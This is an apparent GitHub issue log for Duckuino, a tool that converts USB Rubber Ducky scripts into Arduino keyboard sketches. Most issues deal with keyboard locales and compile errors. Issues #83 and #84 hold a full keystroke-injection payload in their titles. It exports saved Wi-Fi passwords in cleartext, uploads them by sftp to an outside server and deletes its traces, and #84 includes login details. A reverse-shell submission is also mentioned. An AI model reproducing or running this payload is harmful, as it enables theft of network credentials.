Hi!
I'm trying to create a new locale for the keyboards used in the region but I'm running into a small problem... I just can't seem to figure out how to make this work.
It's my first time programming an Arduino as a keyboard...

So far, your library does print the string sequence on the screen, but some keys need to be remapped.
One of the hard things is that my keyboard uses combination keys for

[2018-08-19 06:55] crinny commented on #12
Actually same.

[2018-08-19 08:06] Nurrl commented on #12
Hi @crinny, what is your Locale ?

[2018-08-19 08:07] Nurrl commented on #73
Hi @dodo2709, it might be a problem with your browser, are you using the live version ?

[2018-08-19 08:09] Nurrl commented on #75
Hi @Build-0-Matic, you need to make your own locale file to map each key code to a character, unfortunately, I didn't found any other way to do it than trying and retrying until it works !
Also did you read this ? https://github.com/Nurrl/LocaleKeyboard.js/wiki/How-to-create-a-locale-%3F!

[2018-08-19 08:11] Nurrl commented on #75
Continuing there -> https://github.com/Nurrl/LocaleKeyboard.js/issues/50

[2018-08-19 08:11] #75 closed

[2018-08-19 08:13] Nurrl commented on #36
@FCucumberGames If you still have the problem, I'll reopen this.

[2018-08-19 08:13] #36 closed

[2018-08-19 12:57] crinny commented on #12
Russian

[2018-08-31 22:25] Build-0-Matic opened #77 "Backslashes need double key presses in Fr-Ca keyboard"
Hi!
I have just figures out the problem with the Fr-Ca keyboard layout, but the solution eludes me.
It seems that the backslash needs to be double pressed in order to print properly. It's like the first one was escaping the second...
I tried just doubling them up but this makes the script not always compile, especially when there are only 2.
Is there a way to modify the keyboard.cpp to "double pre

[2018-09-09 11:45] MrBulator opened #78 "__"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-09-15 20:03] juanjosezg opened #79 "Error #include "HID.h""
I got

[code]

I am using Arduino 1.8.7

[2018-09-16 20:37] imnotender opened #80 "pt_PT locale not working"
Hi, I've been trying to get the pt_PT locale working on my Arduino Micro(the real deal). I've been successful in changing my Keyboard.cpp before, and it worked well for everything I tried, but I had to format my pc last month( first time in the 5 years I've had this PC) and now I can't get it working again, not even by downloading the sketch.

__Input code:__
[code]

__Output code:__
[code]

__Err

[2018-09-21 21:11] Nurrl commented on #80
Hello, unfortunately, the default Arduino/Genuino HID Library is only supporting standard Ascii, not Extended Ascii, which means that your `ã` is not in the Duckuino's operating range.

![ASCII](http://www.asciitable.com/index/asciifull.gif)

[2018-09-21 21:11] #80 closed

[2018-09-22 19:01] Build-0-Matic opened #81 "Strange conversion artefacts"
I was just working on a project and discovered a new issue. When you send the `Keyboard.press("r") ;` command, instead of returning the r key it returns =
edit: I did tests with other letters and it still outputs only =

This is really weird since the keymap works fine for the `Keyboard.print(F( ));` function

Anybody got an idea on why this is?

[2018-09-22 22:33] Nurrl commented on #81
Hi @Build-0-Matic, by returning, you mean actually writing as if it was a keypress ?
Can you provide an example, and also with what board are you trying to write these ?

[2018-09-23 15:52] Build-0-Matic commented on #81
Yes, I'm talking about keypresses.
Something weird has happened on github because I added a reply to my original message with more description and it has vanished... I'll just type it again.

I'm using an Arduino Pro Micro clone.
Normally, the script would press win-r to open the run box and then type some code I got from Hak5Daren's duckyscript repository and press enter.

But what happens is tha

[2018-09-29 17:54] moswed opened #82 "Contribute new locale"
hi @Nurrl

since you closed pull requests for the https://github.com/Nurrl/LocaleKeyboard.js repo, where can i put my created .lang file so it gets added to your converter? :)

[2018-10-02 11:30] Sh0tdown opened #83 "DELAY 500 GUI r DELAY 300 STRING cmd DELAY 300 CTRL-SHIFT ENTER DELAY 300 LEFTARROW DELAY 100 ENTER DELAY 300 STRING cd C:\ ENTER DELAY 100 STRING md l ENTER DELAY 100 STRING cd l && @netsh wlan export profile key=clear >nul ENTER DELAY 1000 STRING sftp -oPort=22 **SFTPusername**@**SFTPserver** ENTER DELAY 1200 STRING **SFTPpassword** DELAY 70 ENTER DELAY 500 STRING cd wlan ENTER DELAY 50 STRING mput C:\l\*.xml ENTER DELAY 3000 STRING bye ENTER DELAY 200 STRING cd .. ENTER DELAY 50 STRING del "C:\l" ENTER DELAY 50 STRING j ENTER STRING exit ENTER"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-10-02 11:32] Nurrl commented on #83
Hi @Sh0tdown, can you create a proper issue by using the template please ? Thanks !

[2018-10-02 11:32] #83 closed

[2018-10-02 11:35] Nurrl commented on #81
That seems weird to me too :/ can you provide me the exact code + module you used to convert obtain these weird conversions errors ? Thanks @Build-0-Matic

[2018-10-02 11:49] Nurrl commented on #82
Hi @moswed, in order to create a new locale for the next version, you need to be on the v2.1 branch and look how I made others, it's very straight forward, but if you have any issue, please let me know :)
You'll need to place it in `modules/arduino/locales/`.
Thanks for you involvement in the project by the way :)

[2018-10-02 15:39] Build-0-Matic commented on #81
No problem.
I used the code here https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Fake-Update-screen
Which I input in the online duckduino converter (https://nurrl.github.io/Duckuino/)

Which in turn returns this
`/**
 * Made with Duckuino, an open-source project.
 * Check the license at 'https://github.com/Nurrl/Duckuino/blob/master/LICENSE'
 */

#include "Keyboard.h"

void typeKey(u

[2018-10-02 16:46] Roman200242 opened #84 "DELAY 500 GUI r DELAY 300 STRING cmd DELAY 300 CTRL-SHIFT ENTER DELAY 300 LEFTARROW DELAY 100 ENTER DELAY 300 STRING cd C:\ ENTER DELAY 100 STRING md l ENTER DELAY 100 STRING cd l && @netsh wlan export profile key=clear >nul ENTER DELAY 1000 STRING sftp -oPort=22 stefurak14@files.000webhost.com ENTER DELAY 1200 STRING 0955950585 DELAY 70 ENTER DELAY 500 STRING cd wlan ENTER DELAY 50 STRING mput C:\l\*.xml ENTER DELAY 3000 STRING bye ENTER DELAY 200 STRING cd .. ENTER DELAY 50 STRING del "C:\l" ENTER DELAY 50 STRING j ENTER STRING exit ENTER"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-10-04 04:56] Plazmaz commented on #84
Hi, this issue is not readable or actionable in any way. Please open another issue with the requested info included.

[2018-10-04 04:56] #84 closed

[2018-10-23 00:33] Nurrl commented on #81
The `"r"` over `F("r")` is definitely a Duckuino bug, the other bugs are either related to an incorrect timing or a bad Arduino or even a bug in the Arduino library.

[2018-10-23 21:00] Build-0-Matic commented on #81
Oh well... at least this is easy to fix before compiling on the Arduino, especially since most of the rest is OK.

[2018-10-30 15:22] monster2126 opened #85 "not compiling"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-10-30 15:37] monster2126 commented on #85
nvm i cant put a Capital letter after ALT of CONTROL, e.g (ALT B)

[2018-10-30 15:37] #85 closed

[2018-10-31 13:25] stephanodesouza opened #86 "Upload layout IDE ARDUINO"
I would be able to teach, for lay users like me, how to connect Cidus Whid in the Arduino IDE, to change the layout of the keyboard. In your tutorial teaches you to only modify the Keyborad.cpp file, but does not talk about how to upload the modicication through the IDE. Thank you - By Google Translate pt-BR > Eng

[2018-11-04 00:40] Nurrl commented on #86
The locales are not integrated to the Arduino IDE, they are bundled into the .zip you download.
Did I answered your question ?

[2018-11-04 11:38] stephanodesouza commented on #86
Te a, thank you

[2018-11-06 16:58] #86 closed

[2018-11-22 11:35] moswed commented on #82
somehow i missed your answer to this, sorry ;)
will include my created file asap and make a pull request.

And thank YOU for this nice project 💃

hope to see the locale gets added to offical malduino script converter :)

[2018-11-22 11:35] #82 closed

[2018-12-05 04:04] GanyaAnonymous opened #87 "kod"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-12-12 19:12] JI8 commented on #12
Is there a fix for this problem? ''typeKey(KEY_RETURN);'' returns '')''.

[2018-12-12 20:41] Nurrl commented on #12
Again, you need to select a locale to be bundled with your code for it to work :) @JI8

[2018-12-21 22:20] Maxlanglet opened #88 "BE keyboard layout problem"
I just received my malduino today and the setup went perfectly, now that I try to run my first script, I see that a lot of characters are misplaced on my keyboard or simply appears non-existent. I am using the BE layout, I tried also FR and DE layout but with no success in helping my cause. For example, I can't find where ">" and "<" are when compiling my code. I don't know if it's because I have

[2018-12-21 22:21] Maxlanglet commented on #88
Here's the code concerning the keyboard :
#define SHIFT 0x80
const uint8_t _asciimap[128] =
{
   0x00,             // NUL
   0x00,             // SOH
   0x00,             // STX
   0x00,             // ETX
   0x00,             // EOT
   0x00,             // ENQ
   0x00,             // ACK
   0x00,             // BEL
   0x2a,      // BS  Backspace
   0x2b,      // TAB  Tab
   0x28,      // LF  Ente

[2019-01-08 03:47] Skyluro commented on #59
I had the same issue. Change the double quote to single

Keyboard.press("r");     //incorrect
Keyboard.press('r');      //correct

[2019-02-14 18:08] MatteoCollica commented on #79
Same problem, how can I solve?

[2019-02-20 16:01] Codeded87 opened #89 "error found or not working"
REM Info gathering Ubuntu 1.0 Script issues OS info gathering commands in terminal - by Captain_Harlock, Improved by Thecakeisgit ;D
DELAY 3000
CTRL ALT t
DELAY 1500
STRING clear
DELAY 10
ENTER
DELAY 50
STRING echo "Logged in user: " $USER > info_gathering.txt
ENTER
DELAY 50
STRING echo >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo -n "Distribution Kernel Version: " >> info_gathering.t

[2019-02-28 15:06] TheMaxMur opened #90 "1"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2019-02-28 16:37] Plazmaz commented on #90
Please provide actionable or meaningful information when submitting issues. This issue appears to be empty or have no changes from the issue template.

[2019-02-28 16:37] #90 closed

[2019-03-27 20:45] ghost opened #91 "hi"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2019-03-29 13:48] Nurrl commented on #91
Hello ?!

[2019-03-31 14:35] #91 closed

[2019-04-20 09:38] ax3lt opened #92 "QWERTY keyboard"
Hi I have a problem with the keyboard because it is set to the English AZERTY and I have the QWERTY and therefore the commands put them wrong .....
I have seen the other queries but I can't find them ....
the Download sketch button! only opens a window where nothing is selectable ...
You can help me?

[2019-04-21 14:59] #73 closed

[2019-04-21 15:00] #69 closed

[2019-04-28 11:28] MBR07 opened #93 "GUI r doesn't open GUI r"
## I. Describe your environment

- Platform:
Desktop
- OS:
Win10x64

## II. Describe your problem

**How to reproduce the bug**
Steps to reproduce the behavior:
1. Get an Arduino Pro Micro
2. Type "GUI r" in duckuino
3. Keyboard.press("r"); (It is supposed to output Keyboard.press('r');  )

**Observed behavior**
When trying to avhieve GUI r the program outputs the "wrong apostrophe" making the key

[2019-04-28 11:30] MBR07 commented on #92
There is an arrow right by side of "Download" on the website. Try it out!

[2019-04-28 11:40] ax3lt commented on #92
mmm Sorry but I can' t find the Arrow...
Is that near download sketch?
because if I click on it a window opens and I can only write I think of the links and do downloads but it doesn't work

[2019-04-29 12:39] MBR07 commented on #92
Right beside download (not compile), you click it and there is a menu with
white text.

A domingo, 28/04/2019, 8:40 da manhã, ax3lt <notifications@github.com>
escreveu:

[2019-04-29 12:42] ax3lt commented on #92
yes I clicked it but a white screen opens up and I don't know what to do since I can't select anything

[2019-04-29 12:59] Nurrl commented on #93
Hello @MBR07, this is fixed in the new version, I'm still working on it ! But you can switch to branch `v2.1` and use it !

[2019-04-29 12:59] #93 closed

[2019-04-29 13:00] Nurrl commented on #92
Hello @ax3lt, this is fixed in the new version, I'm still working on it ! But you can switch to branch v2.1, download the project and use it !

[2019-04-29 13:00] #92 closed

[2019-04-29 13:01] Nurrl commented on #89
Hi @Codeded87, I'm sorry, but this is unclear, please reopen an issue with the new templating mechanism !

[2019-04-29 13:01] #89 closed

[2019-04-29 13:07] Nurrl commented on #88
Hello @Maxlanglet, the issue lies in the Mac Keyboard layout, there is no `AltGr` keys on Macs, so you need to modify it according to your keyboard.
I'll suggest you starting from a standard `English` QWERTY keyboard, because macs are using almost the same layouts than the standard QWERTY in thier AZERTY, after that, you'll need to swap keys in the array in order to make it work as intended !

[2019-04-29 13:09] Nurrl commented on #81
This is fixed in the `v2.1` branch, so I'll close the issue ! Thanks

[2019-04-29 13:09] #81 closed

[2019-04-29 13:10] Nurrl commented on #79
Hello, can you describe a bit more the issue, what did you used on Duckuino, with what board are you trying work...
Thanks.

[2019-04-29 13:12] Nurrl commented on #77
Hello @Build-0-Matic, this seems that this is a system-dependent issue, on what OS are you running ?
Thanks !

[2019-04-29 13:27] Nurrl commented on #93
Update: I merged v2.1 into master, you could just use the live version now !

[2019-04-29 13:28] Nurrl commented on #81
Update: I merged v2.1 into master, you could just use the live version now !

Please open a new issue if you see any bug !

[2019-04-29 15:43] Build-0-Matic commented on #77
I'm running Windows 10 Home Fall creator update 64 bit.

[2019-04-30 10:17] Nurrl commented on #77
And when you type the `\` by hand do you need to type it twice ?

[2019-04-30 19:38] Build-0-Matic commented on #77
No, when I type by hand it's just AltCar+\

[2019-05-02 20:40] MBR07 commented on #93
Merci!

[2019-06-09 10:39] him393 opened #94 "page not appear"
Are you using the live version that could be found [here](https://nurrl.github.io/Duckuino/) ?
  - [ ] Yes, absolutely
  - [ ] No, I might try it out

What type of issue is it ?
  - [ ] Graphical issue (UX, UI, Graphical Glitch)
  - [ ] Feature issue (Command not/bad implemented, Non functionnal feature)
  - [ ] Crash (The buttons clicks does nothing at all, Error in console)
  - [ ] Question (Any

[2019-06-09 10:42] Nurrl commented on #94
Hello, please be more specific and fill the issue correctly.

[2019-06-29 22:17] ax3lt opened #95 "Do you release 2.1?"
Do you release versione 2.1?
I can't find it

[2019-07-06 10:23] Nurrl commented on #95
Hello, I merged it into the master but I didn't do the real release, here it is: https://github.com/Nurrl/Duckuino/releases/tag/v2.1

[2019-07-06 10:23] #95 closed

[2019-07-06 10:23] #94 closed

[2019-07-06 10:25] Nurrl commented on #77
Hello again @Build-0-Matic, this is weird, but I had the same issue in the French layout, and I didn't found any workaround, just maybe type the `\` twice ?

[2019-07-06 10:27] Nurrl commented on #79
Hello, I'll close this since it's not active and we have no answer :)

[2019-07-06 10:27] #79 closed

[2019-07-06 19:40] Build-0-Matic commented on #77
That's what I have to do.
I find it quite annoying but I have the feeling that to fix it it would need a full re-write of the code.
I did recently check out how the Hak5 Bash Bunny works. They use the same language files for the USB Rubber Ducky's new HTML encoder. They have a JSON file to which the script passes the keystrokes. The JSON simply says this letter needs to be that key. And they have

[2019-07-06 22:35] Nurrl commented on #77
Hmm, quite cool, the problem is not in Duckuino tho, it's in the Arduino HID core, because when we say to press `\` it doesn't.
But I think there could be a workaround, like I did for the `Alt Gr` keys.

[2019-07-07 17:18] Build-0-Matic commented on #77
While working on the rubber ducky keymaps, I did notice that ALT-GR is the same as CTRL+ALT
Maybe there's part of the solution there.
Or maybe get it to type that key as double everytime... but I can't remember if it needed to be pressed 3 or 4 times if you ask for a \\

[2019-07-20 20:11] oligarhrich opened #96 "first compile"
Are you using the live version that could be found [here](https://nurrl.github.io/Duckuino/) ?
  - [ ] Yes, absolutely
  - [ ] No, I might try it out

What type of issue is it ?
  - [ ] Graphical issue (UX, UI, Graphical Glitch)
  - [ ] Feature issue (Command not/bad implemented, Non functionnal feature)
  - [ ] Crash (The buttons clicks does nothing at all, Error in console)
  - [ ] Question (Any

[2019-07-20 20:11] oligarhrich opened #97 "first compile"
Are you using the live version that could be found [here](https://nurrl.github.io/Duckuino/) ?
  - [ ] Yes, absolutely
  - [x] No, I might try it out

What type of issue is it ?
  - [ ] Graphical issue (UX, UI, Graphical Glitch)
  - [ ] Feature issue (Command not/bad implemented, Non functionnal feature)
  - [ ] Crash (The buttons clicks does nothing at all, Error in console)
  - [x] Question (Any

[2019-07-20 20:12] oligarhrich commented on #97
thanks

[2019-07-20 22:11] #96 closed

[2019-07-21 13:41] Nurrl commented on #97
Hey, please ask your question :)

[2019-07-27 16:45] #97 closed

[2019-08-17 07:29] inventorman opened #98 "Arduino uploading error"
Arduino: 1.8.9 (Windows Store 1.8.21.0) (Windows 10), Board: "Digispark (Default - 16.5mhz)"

C:\Program Files\WindowsApps\ArduinoLLC.ArduinoIDE_1.8.21.0_x86__mdqgnx93n4wtt\arduino-builder -dump-prefs -logger=machine -hardware C:\Program Files\WindowsApps\ArduinoLLC.ArduinoIDE_1.8.21.0_x86__mdqgnx93n4wtt\hardware -hardware C:\Users\Inventor Boy\Documents\ArduinoData\packages -tools C:\Program File

[2019-08-17 07:29] #98 closed

[2019-08-22 15:21] inventorman opened #99 "Arduino IDE Error"
Hello,
Thanks for your awesome project.
I wonder if you could help me with this. After uploading your compiler code to my digispark board, I face with this:

Multiple libraries were found for "Keyboard.h"
In file included from C:\Users\xxx\AppData\Local\Temp\arduino_modified_sketch_539447\sketch_aug22a.ino:5:0:

 Used: D:\xxx\Arduino\IDE\arduino-1.8.9\libraries\Keyboard
D:\xxx\Arduino\IDE\arduino-

[2019-08-24 15:48] Nurrl commented on #99
Hi @inventorman,

Did you selected the good board in the Arduino IDE ?

[2019-08-25 10:33] inventorman commented on #99
Yes, and I'm sure about it because I can upload anything properly except for the code which includes "Keyboard.h".

[2019-08-25 10:40] inventorman commented on #99
Here is a sample code. I wonder if anyone can test it. I appreciate it...

`#include "Keyboard.h"

void typeKey(int key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  // Begining the Keyboard stream
  Keyboard.begin();

  // Wait 500ms
  delay(500);

  delay(500);

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll(

[2019-09-10 22:53] TIMOTHYMK opened #100 "Easy RubberDucky Reverse Shell"
Make sure to change IP to your IP, and change PORT as well.

Let me know what you think. Thanks!

[code]

[2019-09-11 08:41] Nurrl commented on #100
Hello @TIMOTHYMK, this might be a bit out of topic, as this project is only on compatibility one between USB Rubber Ducky and Arduino, maybe you should put it directly to the main repo ?

[2019-09-11 15:10] Plazmaz commented on #100
^^ Yep, this is probably a better fit for https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads. Looks cool though!

[2019-09-14 15:00] #100 closed

[2019-09-26 08:02] tusharkantyad opened #101 "An error occured, the compiler returned undefined content !"
Are you using the live version that could be found [here](https://nurrl.github.io/Duckuino/) ?
  - [x] Yes, absolutely
  - [ ] No, I might try it out

What type of issue is it ?
  - [ ] Graphical issue (UX, UI, Graphical Glitch)
  - [ ] Feature issue (Command not/bad implemented, Non functionnal feature)
  - [ ] Crash (The buttons clicks does nothing at all, Error in console)
  - [ ] Question (Any

[2019-09-27 18:57] Plazmaz commented on #101
Please provide the input that lead to this error.

[2019-10-10 16:16] Zero7007 opened #102 "I'm not seeing any Swiss German keyboard..."
## I. Environment

- Platform: Laptop
- OS: MacOS
 - Browser: Chrome

## II. My problem

I would love to see some swiss_german layout, or at least a way to configure myself this kind of layout...

Thank you for your time.

[2019-10-24 17:20] lidlman1230 opened #103 "Keyboard not fount"
Are you using the live version that could be found [here](https://nurrl.github.io/Duckuino/) ?
  - [ ] Yes, absolutely
  - [ ] No, I might try it out

What type of issue is it ?
  - [ ] Graphical issue (UX, UI, Graphical Glitch)
  - [ ] Feature issue (Command not/bad implemented, Non functionnal feature)
  - [ ] Crash (The buttons clicks does nothing at all, Error in console)
  - [ ] Question (Any

[2019-10-27 22:25] Nurrl commented on #103
Could you provide the .zip *Duckuino* produced ?

[2019-10-27 22:26] Nurrl commented on #103
Also you can't use Arduino Uno with this project !!

[2019-10-28 11:21] lidlman1230 commented on #103
Okay i set the wrong Arduino

[2019-10-28 11:21] #103 closed

[2019-11-10 21:26] #101 closed

[2019-11-22 01:51] Nurrl opened #105 "Add scrollbar to the input textarea _without breaking the line numbers_."

[2019-11-22 01:53] Nurrl commented on #88
Closed due to inactivity.

[2019-11-22 01:53] #88 closed

[2019-11-22 02:00] Nurrl commented on #99
Hi @inventorman, retry by using the good module, the *Digispark* module.
Click the little down arrow next to the *Compile* button, and select Digispark, it should work, if not, please post another issue.

[2019-11-22 02:00] #99 closed

[2019-11-22 02:04] Nurrl commented on #102
Hello @Zero7007, it's a bit weird how to configure keys, it haves something to do with Key Codes, when I did it, I did it by **trial and error** until I finally done it.

[2019-11-22 02:59] Nurrl opened #106 "Add an automatic locale generator to help people make locales."
Docs:
- https://www.win.tue.nl/~aeb/linux/kbd/scancodes-14.html

[2019-12-23 10:08] Evgexa029 opened #107 "Son19822004"
Are you using the live version that could be found [here](https://nurrl.github.io/Duckuino/) ?
  - [x] Yes, absolutely
  - [ ] No, I might try it out

What type of issue is it ?
  - [x] Graphical issue (UX, UI, Graphical Glitch)
  - [ ] Feature issue (Command not/bad implemented, Non functionnal feature)
  - [ ] Crash (The buttons clicks does nothing at all, Error in console)
  - [ ] Question (Any

[2019-12-29 19:05] #107 closed

[2020-01-07 15:57] #102 closed

[2020-04-30 03:37] kronflux opened #109 "[REQ] Additional keyboard function keys"
Could someone add the ability to use additional function keys that were present on older and specialty keyboard?
F13-F18

#define KEY_F13				0x68
#define KEY_F14				0x69
#define KEY_F15				0x6A
#define KEY_F16				0x6B
#define KEY_F17				0x6C
#define KEY_F18				0x6D

I have tried adding this myself, but have limited knowledge with Arduino libraries.
I try to press F15, and I get "j" rather than the

[2020-04-30 03:45] kronflux commented on #109
Turns out the values are wrong.

These are the correct ones:

#define KEY_F13	0xF0 // 0x68 + 0x88
#define KEY_F14	0xF1 // 0x69 + 0x88
#define KEY_F15	0xF2 // 0x6A + 0x88
#define KEY_F16	0xF3 // 0x6B + 0x88
#define KEY_F17	0xF4 // 0x6C + 0x88
#define KEY_F18	0xF5 // 0x6D + 0x88

Sorry. Closing.

[2020-04-30 03:45] #109 closed

[2020-05-18 17:24] kenoc1 commented on #12
Hey, I have the same problem. ''typeKey(KEY_RETURN);'' returns '')'' What do you mean with select a locale to be bundled with your code @Nurrl ?

[2020-05-19 09:28] Nurrl commented on #12
I mean use this:
![rsz_screenshot_from_2020-05-19_11-25-47](https://user-images.githubusercontent.com/15341887/82309827-e8b3ee80-99c3-11ea-9964-d0b785715cf6.png)

[2020-05-19 09:29] Nurrl commented on #12
And select your locale, then try again to see if it works @kenoc1

[2020-06-25 07:36] keldnorman opened #110 "HID.h: No such file or directory"
## I. Describe your environment

- Platform: Laptop Windows 10
- Arduino Version: 1.8.3 (latest)

## II. Describe your problem

- cloned the code (downloaded the zip file)
- double clicked the Sketch.ino file
- selected tools -> port -> arduino/genuino micro (com9)
- compile failed with the error: HID.h: No such file or directory

Pressed compile button...

C:\Program Files (x86)\Arduino\arduino-b

[2020-06-25 07:54] keldnorman commented on #110
Fixed with :   select tools -> board -> Arduino Leonardo

[2020-06-25 07:54] #110 closed

[2020-06-25 08:16] Nurrl commented on #110
Hi @keldnorman, yes unfortunately some Arduino boards don't have Keyboard Emulation capabilities

[2020-12-11 17:09] syk0tek opened #111 "Duckuino is not compiling when using local webpage from the zipped folder."
-The Compile button is not clickable after writing/pasting the ducky script into the input text. The live version doesn't act normally and compiles the script.

- Platform: PC

**How to reproduce the bug**
Steps to reproduce the behavior:
1. Download the zipped folder and extract it
2. Open the website "index" provided in the zipped folder which uses the local files instead of using the live versi

[2020-12-12 19:00] Nurrl commented on #111
Hello @syk0tek, thanks for your report,

this is totally expected as the page uses an **XHR request** to get configuration files(`modules/modules.json`) and due to [CORS](https://developer.mozilla.org/fr/docs/Web/HTTP/CORS) behavior on local files, it blocks the request, generating a Javascript exception.
Unfortunately this is not fixable, it comes from how browsers protect your local files from a

[2020-12-12 19:00] #111 closed

[2021-05-19 15:53] LegendEag1e opened #112 "The downloaded version doesn't allow me to click the compile button."
The compiler doesn't change the compile button from inactive when ducky script is inputted.
The live version works fine, but the downloadable version doesn't work in any browser

[2021-05-22 19:08] Nurrl commented on #112
Hello @LegendEag1e, thanks for reporting that issue,
unfortunately, this is due to **CORS**(cf. [here](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) for further reference, but this is quite complex to understand directly) policy in modern web browsers which prevents a script from loading a file from the local disk, so the project won't work when accessing the page with `file:///`.

Two o

[2021-05-22 19:09] #112 closed

[2021-09-26 10:57] mbenitog opened #113 "Compile error with Digispark"
Are you using the live version that could be found [here](https://nurrl.github.io/Duckuino/) ?
  - [x] Yes, absolutely
  - [ ] No, I might try it out

What type of issue is it ?
  - [ ] Graphical issue (UX, UI, Graphical Glitch)
  - [ ] Feature issue (Command not/bad implemented, Non functional feature)
  - [x] Crash (The buttons clicks does nothing at all, Error in console)
  - [ ] Question (Any

[2021-09-28 22:20] Nurrl commented on #113
Hello @mbenitog,

Thanks for your report and sorry for the delay, so the problem is that it does not compile on **Digispark**..
Unfortunately I don't have any **Digispark** board, neither do I have a development environment for this.

From what I see on the web, the `__FlashStringHelper` is an alias to `fstr_t` which in this case should work. What core are you using for you board ?